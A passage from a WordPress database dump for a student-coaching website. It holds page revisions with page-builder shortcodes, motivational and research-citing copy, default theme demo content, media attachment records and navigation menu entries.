alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"THE RESEARCH\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: center;\">All of our programs and initiatives are built on evidence-based research.  Of course, we walk students through the \"how\", but more importantly, we explain the \"why\".  Giving your students a strong reason to act on the information is our obsession.</p>\r\n<!-- /wp:paragraph -->[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>VISON</strong></p>\r\n<p style=\"text-align: center;\"><em><strong><span style=\"text-decoration: underline;\">What you focus on is sought out by your Reticular Activating System.</span> </strong></em>(Learn more from the University of Minnesota <a href=\"https://extension.umn.edu/two-you-video-series/ras\">here</a>)</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>ROUTINES</strong></p>\r\n<p style=\"text-align: center;\"><span style=\"text-decoration: underline;\"><em><strong>Scientists say your morning mood affects your productivity and relationships for the rest of the day</strong></em></span>. (read the full study <a href=\"https://faculty.wharton.upenn.edu/wp-content/uploads/2013/01/Rothbard-Wilk_AMJ_Final.pdf\">here</a>)</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>ACCOUNTABILITY</strong></p>\r\n<p style=\"text-align: center;\"><span style=\"text-decoration: underline;\"><strong>I</strong></span><em style=\"font-weight: bold;\"><span style=\"text-decoration: underline;\"><strong>f</strong> you have a specific accountability appointment, you will increase your chance of success by up to 95%”</span>  </em>(read the full study <a href=\"https://medium.com/the-mission/the-accountability-effect-a-simple-way-to-achieve-your-goals-and-boost-your-performance-8a07c76ef53a#:~:text=The%20American%20Society%20of%20Training,success%20by%20up%20to%2095%25.\">here</a>)</p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>MINDFULNESS</strong></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"text-decoration: underline;\">Students who meditated had <em>15% better math scores, showed 24% more social behaviours, were 24% less aggressive.</em>..</span></strong> (read the full article <a href=\"https://time.com/3682311/mindfulness-math/\">here</a>)</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>GOAL SETTING</strong></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"text-decoration: underline;\">You\'re 42 percent more likely to achieve your goals if you write them down.</span>  </em></strong>(read the full study <a href=\"https://braveheartsales.com/wp-content/uploads/Goals-Research-Summary.pdf?x60870\">here</a>)</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>SELF-CONFIDENCE</strong></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"text-decoration: underline;\">“Setting goals is linked to self-confidence, motivation, and autonomy (Locke &amp; Latham, 2006).”</span>  </em></strong>(read the full study <a href=\"https://www.psychologytoday.com/ca/blog/the-moment-youth/201803/goal-setting-is-linked-higher-achievement\">here</a>)</p>\r\n[/vc_column_text][/vc_column][/vc_row]','About','','publish','closed','closed','','about','','','2020-11-06 01:30:42','2020-11-06 01:30:42','',0,'http://highperformingstudent.com/?page_id=7',0,'page','',0),(8,1,'2020-10-28 12:30:59','2020-10-28 12:30:59','[vc_row bg_overlay=\"light\" css=\".vc_custom_1603932094448{padding-bottom: 15px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\"][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"We\'re here to help!\" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: center;\">Your message matters.  Please take a moment below to let us know how we can help you.\r\nYou will hear from us in under 24 hours :-)</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][wpforms id=\"2100\" title=\"false\" description=\"false\"][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row]','Contact','','publish','closed','closed','','contact','','','2020-10-29 00:43:26','2020-10-29 00:43:26','',0,'http://highperformingstudent.com/?page_id=8',0,'page','',0),(9,1,'2020-10-28 12:30:59','2020-10-28 12:30:59','','Blog','','publish','closed','closed','','blog','','','2020-10-28 12:30:59','2020-10-28 12:30:59','',0,'http://highperformingstudent.com/?page_id=9',0,'page','',0),(2138,1,'2021-02-01 14:52:48','2021-02-01 14:52:48','','Untitled design (80)','','inherit','open','closed','','untitled-design-80','','','2021-02-01 14:52:48','2021-02-01 14:52:48','',623,'http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-80.png',0,'attachment','image/png',0),(2139,1,'2021-02-01 14:54:42','2021-02-01 14:54:42','[vc_row el_id=\"first\" content_width=\"fullwidth\" css=\".vc_custom_1612191280467{padding-top: 237px !important;padding-bottom: 237px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-80.png?id=2138) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" fullwidth=\"yes\" row_width=\"fullwidth\"][vc_column width=\"1/6\"][/vc_column][vc_column width=\"5/6\"][vc_custom_heading text=\"Become ``Real World`` Ready\" font_container=\"tag:h1|font_size:4.5rem|text_align:left|color:%23ffffff|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_custom_heading text=\"Your High-Performance Journey Starts Now.\" font_container=\"tag:p|font_size:1.1em|text_align:left|color:%23ffffff|line_height:1.1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:500%20bold%20regular%3A500%3Anormal\"][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column][vc_custom_heading text=\"You are going to die...\" font_container=\"tag:h2|font_size:4.5rem|text_align:left|color:%23333333|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: left;\"><span style=\"font-weight: 400;\">Like a food product, you have a personal “best before” date.  And before that date, there are memories you want to make, places you want to explore, people you want to meet, and an impact you want to create.  The only way to accomplish this before you expire is to reach your full potential.  <strong>Through the development of six key-skills, we help you max out your potential to live a healthy, happier and more productive life.</strong></span></p>\r\n[/vc_column_text][/vc_column][/vc_row]','Home1','','inherit','closed','closed','','623-revision-v1','','','2021-02-01 14:54:42','2021-02-01 14:54:42','',623,'http://highperformingstudent.com/2021/02/01/623-revision-v1/',0,'revision','',0),(2140,1,'2021-02-01 14:55:23','2021-02-01 14:55:23','','Screen Shot 2021-02-01 at 9.54.56 AM','','inherit','open','closed','','screen-shot-2021-02-01-at-9-54-56-am','','','2021-02-01 14:55:23','2021-02-01 14:55:23','',623,'http://highperformingstudent.com/wp-content/uploads/2021/02/Screen-Shot-2021-02-01-at-9.54.56-AM.png',0,'attachment','image/png',0),(2141,1,'2021-02-01 14:58:06','2021-02-01 14:58:06','','Untitled design (81)','','inherit','open','closed','','untitled-design-81','','','2021-02-01 14:58:06','2021-02-01 14:58:06','',623,'http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-81.png',0,'attachment','image/png',0),(2142,1,'2021-02-01 14:59:06','2021-02-01 14:59:06','','Untitled design (80)','','inherit','open','closed','','untitled-design-80-2','','','2021-02-01 14:59:06','2021-02-01 14:59:06','',623,'http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-80-1.png',0,'attachment','image/png',0),(2147,1,'2021-02-01 15:09:31','2021-02-01 15:09:31','.btn {\n    color: #fff;\n    background-color: #e612a9;\n    font-weight: 800;\n    opacity: 0.85;\n    -webkit-transition: opacity .3s, background-color .3s;\n    transition: opacity .3s, background-color .3s;\n    -moz-transition: opacity .3s, background-color .3s;\n}','north','','inherit','closed','closed','','39-revision-v1','','','2021-02-01 15:09:31','2021-02-01 15:09:31','',39,'http://highperformingstudent.com/2021/02/01/39-revision-v1/',0,'revision','',0),(2148,1,'2021-02-01 15:29:10','2021-02-01 15:29:10','','Untitled design (82)','','inherit','open','closed','','untitled-design-82','','','2021-02-01 15:29:10','2021-02-01 15:29:10','',623,'http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-82.png',0,'attachment','image/png',0),(11,1,'2020-10-28 12:29:27','2020-10-28 12:29:27','','HPS_Color_Black Text.png','','inherit','open','closed','','hps_color_black-text-png','','','2020-10-28 12:29:27','2020-10-28 12:29:27','',0,'http://highperformingstudent.com/wp-content/uploads/2020/10/HPS_Color_Black-Text.png.png',0,'attachment','image/png',0),(12,1,'2020-10-28 12:29:40','2020-10-28 12:29:40','http://highperformingstudent.com/wp-content/uploads/2020/10/cropped-HPS_Color_Black-Text.png.png','cropped-HPS_Color_Black-Text.png.png','','inherit','open','closed','','cropped-hps_color_black-text-png-png','','','2020-10-28 12:29:40','2020-10-28 12:29:40','',0,'http://highperformingstudent.com/wp-content/uploads/2020/10/cropped-HPS_Color_Black-Text.png.png',0,'attachment','image/png',0),(13,1,'2020-10-28 12:29:58','2020-10-28 12:29:58','','Flame Color','','inherit','open','closed','','flame-color','','','2020-10-28 12:29:58','2020-10-28 12:29:58','',0,'http://highperformingstudent.com/wp-content/uploads/2020/10/Flame-Color.png',0,'attachment','image/png',0),(14,1,'2020-10-28 12:30:07','2020-10-28 12:30:07','http://highperformingstudent.com/wp-content/uploads/2020/10/cropped-Flame-Color.png','cropped-Flame-Color.png','','inherit','open','closed','','cropped-flame-color-png','','','2020-10-28 12:30:07','2020-10-28 12:30:07','',0,'http://highperformingstudent.com/wp-content/uploads/2020/10/cropped-Flame-Color.png',0,'attachment','image/png',0),(15,1,'2020-10-28 12:30:22','2020-10-28 12:30:22','','Flame B&W','','inherit','open','closed','','flame-bw','','','2020-10-28 12:30:22','2020-10-28 12:30:22','',0,'http://highperformingstudent.com/wp-content/uploads/2020/10/Flame-BW.png',0,'attachment','image/png',0),(16,1,'2020-10-28 12:30:26','2020-10-28 12:30:26','http://highperformingstudent.com/wp-content/uploads/2020/10/cropped-Flame-BW.png','cropped-Flame-BW.png','','inherit','open','closed','','cropped-flame-bw-png','','','2020-10-28 12:30:26','2020-10-28 12:30:26','',0,'http://highperformingstudent.com/wp-content/uploads/2020/10/cropped-Flame-BW.png',0,'attachment','image/png',0),(17,1,'2020-10-28 12:30:36','2020-10-28 12:30:36','http://highperformingstudent.com/wp-content/uploads/2020/10/cropped-Flame-Color-1.png','cropped-Flame-Color-1.png','','inherit','open','closed','','cropped-flame-color-1-png','','','2020-10-28 12:30:36','2020-10-28 12:30:36','',0,'http://highperformingstudent.com/wp-content/uploads/2020/10/cropped-Flame-Color-1.png',0,'attachment','image/png',0),(2130,1,'2021-02-01 14:16:19','2021-02-01 14:16:19','','SamDemma-Logo-SocialIcon-02','','inherit','open','closed','','samdemma-logo-socialicon-02','','','2021-02-01 14:16:19','2021-02-01 14:16:19','',0,'http://highperformingstudent.com/wp-content/uploads/2021/02/SamDemma-Logo-SocialIcon-02.png',0,'attachment','image/png',0),(2131,1,'2021-02-01 14:16:29','2021-02-01 14:16:29','http://highperformingstudent.com/wp-content/uploads/2021/02/cropped-SamDemma-Logo-SocialIcon-02.png','cropped-SamDemma-Logo-SocialIcon-02.png','','inherit','open','closed','','cropped-samdemma-logo-socialicon-02-png','','','2021-02-01 14:16:29','2021-02-01 14:16:29','',0,'http://highperformingstudent.com/wp-content/uploads/2021/02/cropped-SamDemma-Logo-SocialIcon-02.png',0,'attachment','image/png',0),(2136,1,'2021-02-01 14:49:32','2021-02-01 14:49:32','','Untitled design (79)','','inherit','open','closed','','untitled-design-79','','','2021-02-01 14:49:32','2021-02-01 14:49:32','',623,'http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-79.png',0,'attachment','image/png',0),(2134,1,'2021-02-01 14:27:39','2021-02-01 14:27:39','[vc_row full_height=\"yes\" video_bg=\"vimeo\" el_id=\"first\" content_width=\"fullwidth\" vimeo=\"https://vimeo.com/398647180\" css=\".vc_custom_1612189656123{padding-top: 237px !important;padding-bottom: 237px !important;}\" fullwidth=\"yes\" row_width=\"fullwidth\"][vc_column][vc_custom_heading text=\"Become ``Real World`` Ready\" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23000000|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_custom_heading text=\"Your High-Performance Journey Starts Now.\" font_container=\"tag:p|font_size:1.1em|text_align:center|color:%23000000|line_height:1.1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:500%20bold%20regular%3A500%3Anormal\"][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column][vc_custom_heading text=\"You are going to die...\" font_container=\"tag:h2|font_size:4.5rem|text_align:left|color:%23333333|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: left;\"><span style=\"font-weight: 400;\">Like a food product, you have a personal “best before” date.  And before that date, there are memories you want to make, places you want to explore, people you want to meet, and an impact you want to create.  The only way to accomplish this before you expire is to reach your full potential.  <strong>Through the development of six key-skills, we help you max out your potential to live a healthy, happier and more productive life.</strong></span></p>\r\n[/vc_column_text][/vc_column][/vc_row]','Home1','','inherit','closed','closed','','623-revision-v1','','','2021-02-01 14:27:39','2021-02-01 14:27:39','',623,'http://highperformingstudent.com/2021/02/01/623-revision-v1/',0,'revision','',0),(2135,1,'2021-02-01 14:29:38','2021-02-01 14:29:38','[vc_row full_height=\"yes\" video_bg=\"vimeo\" el_id=\"first\" content_width=\"fullwidth\" vimeo=\"https://www.vimeo.com/398647180\" css=\".vc_custom_1612189769555{padding-top: 237px !important;padding-bottom: 237px !important;}\" fullwidth=\"yes\" row_width=\"fullwidth\"][vc_column][vc_custom_heading text=\"Become ``Real World`` Ready\" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23000000|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_custom_heading text=\"Your High-Performance Journey Starts Now.\" font_container=\"tag:p|font_size:1.1em|text_align:center|color:%23000000|line_height:1.1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:500%20bold%20regular%3A500%3Anormal\"][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column][vc_custom_heading text=\"You are going to die...\" font_container=\"tag:h2|font_size:4.5rem|text_align:left|color:%23333333|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: left;\"><span style=\"font-weight: 400;\">Like a food product, you have a personal “best before” date.  And before that date, there are memories you want to make, places you want to explore, people you want to meet, and an impact you want to create.  The only way to accomplish this before you expire is to reach your full potential.  <strong>Through the development of six key-skills, we help you max out your potential to live a healthy, happier and more productive life.</strong></span></p>\r\n[/vc_column_text][/vc_column][/vc_row]','Home1','','inherit','closed','closed','','623-revision-v1','','','2021-02-01 14:29:38','2021-02-01 14:29:38','',623,'http://highperformingstudent.com/2021/02/01/623-revision-v1/',0,'revision','',0),(18,1,'2020-10-28 12:30:59','2020-10-28 12:30:59','<!-- wp:group {\"align\":\"wide\"} --><div class=\"wp-block-group alignwide\"><div class=\"wp-block-group__inner-container\"><!-- wp:heading {\"align\":\"center\"} --><h2 class=\"has-text-align-center\">The premier destination for modern art in Northern Sweden. Open from 10 AM to 6 PM every day during the summer months.</h2><!-- /wp:heading --></div></div><!-- /wp:group --><!-- wp:columns {\"align\":\"wide\"} --><div class=\"wp-block-columns alignwide\"><!-- wp:column --><div class=\"wp-block-column\"><!-- wp:group --><div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container\"><!-- wp:image {\"align\":\"full\",\"id\":37,\"sizeSlug\":\"full\"} --><figure class=\"wp-block-image alignfull size-full\"><img src=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-three-quarters-1.png\" alt=\"\" class=\"wp-image-37\"/></figure><!-- /wp:image --><!-- wp:heading {\"level\":3} --><h3>Works and Days</h3><!-- /wp:heading --><!-- wp:paragraph --><p>August 1 -- December 1</p><!-- /wp:paragraph --><!-- wp:button {\"className\":\"is-style-outline\"} --><div class=\"wp-block-button is-style-outline\"><a class=\"wp-block-button__link\" href=\"https://make.wordpress.org/core/2019/09/27/block-editor-theme-related-updates-in-wordpress-5-3/\">Read More</a></div><!-- /wp:button --></div></div><!-- /wp:group --><!-- wp:group --><div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container\"><!-- wp:image {\"align\":\"full\",\"id\":37,\"sizeSlug\":\"full\"} --><figure class=\"wp-block-image alignfull size-full\"><img src=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-three-quarters-3.png\" alt=\"\" class=\"wp-image-37\"/></figure><!-- /wp:image --><!-- wp:heading {\"level\":3} --><h3>Theatre of Operations</h3><!-- /wp:heading --><!-- wp:paragraph --><p>October 1 -- December 1</p><!-- /wp:paragraph --><!-- wp:button {\"className\":\"is-style-outline\"} --><div class=\"wp-block-button is-style-outline\"><a class=\"wp-block-button__link\" href=\"https://make.wordpress.org/core/2019/09/27/block-editor-theme-related-updates-in-wordpress-5-3/\">Read More</a></div><!-- /wp:button --></div></div><!-- /wp:group --></div><!-- /wp:column --><!-- wp:column --><div class=\"wp-block-column\"><!-- wp:group --><div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container\"><!-- wp:image {\"align\":\"full\",\"id\":37,\"sizeSlug\":\"full\"} --><figure class=\"wp-block-image alignfull size-full\"><img src=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-three-quarters-2.png\" alt=\"\" class=\"wp-image-37\"/></figure><!-- /wp:image --><!-- wp:heading {\"level\":3} --><h3>The Life I Deserve</h3><!-- /wp:heading --><!-- wp:paragraph --><p>August 1 -- December 1</p><!-- /wp:paragraph --><!-- wp:button {\"className\":\"is-style-outline\"} --><div class=\"wp-block-button is-style-outline\"><a class=\"wp-block-button__link\" href=\"https://make.wordpress.org/core/2019/09/27/block-editor-theme-related-updates-in-wordpress-5-3/\">Read More</a></div><!-- /wp:button --></div></div><!-- /wp:group --><!-- wp:group --><div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container\"><!-- wp:image {\"align\":\"full\",\"id\":37,\"sizeSlug\":\"full\"} --><figure class=\"wp-block-image alignfull size-full\"><img src=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-three-quarters-4.png\" alt=\"\" class=\"wp-image-37\"/></figure><!-- /wp:image --><!-- wp:heading {\"level\":3} --><h3>From Signac to Matisse</h3><!-- /wp:heading --><!-- wp:paragraph --><p>October 1 -- December 1</p><!-- /wp:paragraph --><!-- wp:button {\"className\":\"is-style-outline\"} --><div class=\"wp-block-button is-style-outline\"><a class=\"wp-block-button__link\" href=\"https://make.wordpress.org/core/2019/09/27/block-editor-theme-related-updates-in-wordpress-5-3/\">Read More</a></div><!-- /wp:button --></div></div><!-- /wp:group --></div><!-- /wp:column --></div><!-- /wp:columns --><!-- wp:image {\"align\":\"full\",\"id\":37,\"sizeSlug\":\"full\"} --><figure class=\"wp-block-image alignfull size-full\"><img src=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-landscape-2.png\" alt=\"\" class=\"wp-image-37\"/></figure><!-- /wp:image --><!-- wp:group {\"align\":\"wide\"} --><div class=\"wp-block-group alignwide\"><div class=\"wp-block-group__inner-container\"><!-- wp:heading {\"align\":\"center\",\"textColor\":\"accent\"} --><h2 class=\"has-accent-color has-text-align-center\">&#8220;Cyborgs, as the philosopher Donna Haraway established, are not reverent. They do not remember the cosmos.&#8221;</h2><!-- /wp:heading --></div></div><!-- /wp:group --><!-- wp:paragraph {\"dropCap\":true} --><p class=\"has-drop-cap\">With seven floors of striking architecture, UMoMA shows exhibitions of international contemporary art, sometimes along with art historical retrospectives. Existential, political and philosophical issues are intrinsic to our programme. As visitor you are invited to guided tours artist talks, lectures, film screenings and other events with free admission</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>The exhibitions are produced by UMoMA in collaboration with artists and museums around the world and they often attract international attention. UMoMA has received a Special Commendation from the European Museum of the Year, and was among the top candidates for the Swedish Museum of the Year Award as well as for the Council of Europe Museum Prize.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p></p><!-- /wp:paragraph --><!-- wp:group {\"customBackgroundColor\":\"#ffffff\",\"align\":\"wide\"} --><div class=\"wp-block-group alignwide has-background\" style=\"background-color:#ffffff\"><div class=\"wp-block-group__inner-container\"><!-- wp:group --><div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container\"><!-- wp:heading {\"align\":\"center\"} --><h2 class=\"has-text-align-center\">Become a Member and Get Exclusive Offers!</h2><!-- /wp:heading --><!-- wp:paragraph {\"align\":\"center\"} --><p class=\"has-text-align-center\">Members get access to exclusive exhibits and sales. Our memberships cost $99.99 and are billed annually.</p><!-- /wp:paragraph --><!-- wp:button {\"align\":\"center\"} --><div class=\"wp-block-button aligncenter\"><a class=\"wp-block-button__link\" href=\"https://make.wordpress.org/core/2019/09/27/block-editor-theme-related-updates-in-wordpress-5-3/\">Join the Club</a></div><!-- /wp:button --></div></div><!-- /wp:group --></div></div><!-- /wp:group --><!-- wp:gallery {\"ids\":[39,38],\"align\":\"wide\"} --><figure class=\"wp-block-gallery alignwide columns-2 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img src=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-square-2.png\" alt=\"\" data-id=\"39\" data-full-url=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-square-2.png\" data-link=\"assets/images/2020-square-2/\" class=\"wp-image-39\"/></figure></li><li class=\"blocks-gallery-item\"><figure><img src=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-square-1.png\" alt=\"\" data-id=\"38\" data-full-url=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-square-1.png\" data-link=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-square-1/\" class=\"wp-image-38\"/></figure></li></ul></figure><!-- /wp:gallery -->','The New UMoMA Opens its Doors','','inherit','closed','closed','','6-revision-v1','','','2020-10-28 12:30:59','2020-10-28 12:30:59','',6,'http://highperformingstudent.com/2020/10/28/6-revision-v1/',0,'revision','',0),(19,1,'2020-10-28 12:30:59','2020-10-28 12:30:59','<!-- wp:paragraph -->\n<p>You might be an artist who would like to introduce yourself and your work here or maybe you&rsquo;re a business with a mission to describe.</p>\n<!-- /wp:paragraph -->','About','','inherit','closed','closed','','7-revision-v1','','','2020-10-28 12:30:59','2020-10-28 12:30:59','',7,'http://highperformingstudent.com/2020/10/28/7-revision-v1/',0,'revision','',0),(20,1,'2020-10-28 12:30:59','2020-10-28 12:30:59','<!-- wp:paragraph -->\n<p>This is a page with some basic contact information, such as an address and phone number. You might also try a plugin to add a contact form.</p>\n<!-- /wp:paragraph -->','Contact','','inherit','closed','closed','','8-revision-v1','','','2020-10-28 12:30:59','2020-10-28 12:30:59','',8,'http://highperformingstudent.com/2020/10/28/8-revision-v1/',0,'revision','',0),(21,1,'2020-10-28 12:30:59','2020-10-28 12:30:59','','Blog','','inherit','closed','closed','','9-revision-v1','','','2020-10-28 12:30:59','2020-10-28 12:30:59','',9,'http://highperformingstudent.com/2020/10/28/9-revision-v1/',0,'revision','',0),(22,1,'2020-10-28 12:30:59','2020-10-28 12:30:59','','Start here','','publish','closed','closed','','home','','','2020-10-29 00:21:08','2020-10-29 00:21:08','',0,'http://highperformingstudent.com/2020/10/28/home/',1,'nav_menu_item','',0),(23,1,'2020-10-28 12:30:59','2020-10-28 12:30:59','','About HPS','','publish','closed','closed','','23','','','2020-10-29 00:21:09','2020-10-29 00:21:09','',0,'http://highperformingstudent.com/2020/10/28/23/',2,'nav_menu_item','',0),(25,1,'2020-10-28 12:30:59','2020-10-28 12:30:59','','Login','','publish','closed','closed','','25','','','2020-10-29 00:21:09','2020-10-29 00:21:09','',0,'http://highperformingstudent.com/2020/10/28/25/',7,'nav_menu_item','',0),(26,1,'2020-10-28 12:30:59','2020-10-28 12:30:59','','Home','','publish','closed','closed','','home-2','','','2020-10-28 12:30:59','2020-10-28 12:30:59','',0,'http://highperformingstudent.com/2020/10/28/home-2/',0,'nav_menu_item','',0),(27,1,'2020-10-28 12:30:59','2020-10-28 12:30:59',' ','','','publish','closed','closed','','27','','','2020-10-28 12:30:59','2020-10-28 12:30:59','',0,'http://highperformingstudent.com/2020/10/28/27/',1,'nav_menu_item','',0),(28,1,'2020-10-28 12:30:59','2020-10-28 12:30:59',' ','','','publish','closed','closed','','28','','','2020-10-28 12:30:59','2020-10-28 12:30:59','',0,'http://highperformingstudent.com/2020/10/28/28/',2,'nav_menu_item','',0),(29,1,'2020-10-28 12:30:59','2020-10-28 12:30:59',' ','','','publish','closed','closed','','29','','','2020-10-28 12:30:59','2020-10-28 12:30:59','',0,'http://highperformingstudent.com/2020/10/28/29/',3,'nav_menu_item','',0),(30,1,'2020-10-28 12:30:59','2020-10-28 12:30:59','','Yelp','','publish','closed','closed','','yelp','','','2020-10-28 12:30:59','2020-10-28 12:30:59','',0,'http://highperformingstudent.com/2020/10/28/yelp/',0,'nav_menu_item','',0),(31,1,'2020-10-28 12:30:59','2020-10-28 12:30:59','','Facebook','','publish','closed','closed','','facebook','','','2020-10-28 12:30:59','2020-10-28 12:30:59','',0,'http://highperformingstudent.com/2020/10/28/facebook/',1,'nav_menu_item','',0),(32,1,'2020-10-28 12:30:59','2020-10-28 12:30:59','','Twitter','','publish','closed','closed','','twitter','','','2020-10-28 12:30:59','2020-10-28 12:30:59','',0,'http://highperformingstudent.com/2020/10/28/twitter/',2,'nav_menu_item','',0),(33,1,'2020-10-28 12:30:59','2020-10-28 12:30:59','','Instagram','','publish','closed','closed','','instagram','','','2020-10-28 12:30:59','2020-10-28 12:30:59','',0,'http://highperformingstudent.com/2020/10/28/instagram/',3,'nav_menu_item','',0),(34,1,'2020-10-28 12:30:59','2020-10-28 12:30:59','','Email','','publish','closed','closed','','email','','','2020-10-28 12:30:59','2020-10-28 12:30:59','',0,'http://highperformingstudent.com/2020/10/28/email/',4,'nav_menu_item','',0),(2037,1,'2020-10-28 15:22:18','2020-10-28 15:22:18','','imageedit_7_3676711981','','inherit','open','closed','','imageedit_7_3676711981','','','2020-10-28 15:22:18','2020-10-28 15:22:18','',623,'http://highperformingstudent.com/wp-content/uploads/2020/10/imageedit_7_3676711981.png',0,'attachment','image/png',0),(2038,1,'2020-10-28 15:31:00','2020-10-28 15:31:00','','Untitled design (27) copy','','inherit','open','closed','','untitled-design-27-copy','','','2020-10-28 15:31:00','2020-10-28 15:31:00','',623,'http://highperformingstudent.com/wp-content/uploads/2020/10/Untitled-design-27-copy.png',0,'attachment','image/png',0),(37,1,'2020-10-28 13:26:08','2020-10-28 13:26:08','','HPS_Color_White Text','','inherit','open','closed','','hps_color_white-text','','','2020-10-28 13:26:08','2020-10-28 13:26:08','',0,'http://highperformingstudent.com/wp-content/uploads/2020/10/HPS_Color_White-Text.png',0,'attachment','image/png',0),(39,1,'2020-10-28 13:35:41','2020-10-28 13:35:41','.btn {\n    color: #fff;\n    background-color: #e612a9;\n    font-weight: 800;\n    opacity: 0.85;\n    -webkit-transition: opacity .3s, background-color .3s;\n    transition: opacity .3s, background-color .3s;\n    